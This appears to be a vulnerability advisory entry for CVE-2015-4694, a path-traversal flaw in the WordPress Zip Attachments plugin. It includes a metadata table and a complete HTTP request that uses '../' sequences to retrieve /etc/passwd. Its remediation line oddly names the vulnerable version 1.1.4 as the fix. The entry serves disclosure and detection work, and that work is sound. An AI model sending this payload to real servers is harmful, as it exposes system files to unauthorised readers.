| Title | WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval |
|---|---|
| Author | 0x_Akoko |
| Severity | High |
| Impact | Arbitrary file retrieval |
| Remediation | Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed. |
| CVSS Score | 8.6 |
| EPSS Score | 0.35068 |
| CVE ID | CVE-2015-4694 |
| CWE ID | CWE-22 |
| Tags | cve2015 cve wp-plugin wpscan lfi wordpress zip_attachments_project vuln |
WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.
GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4694.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-4694.pcap
N/AN/A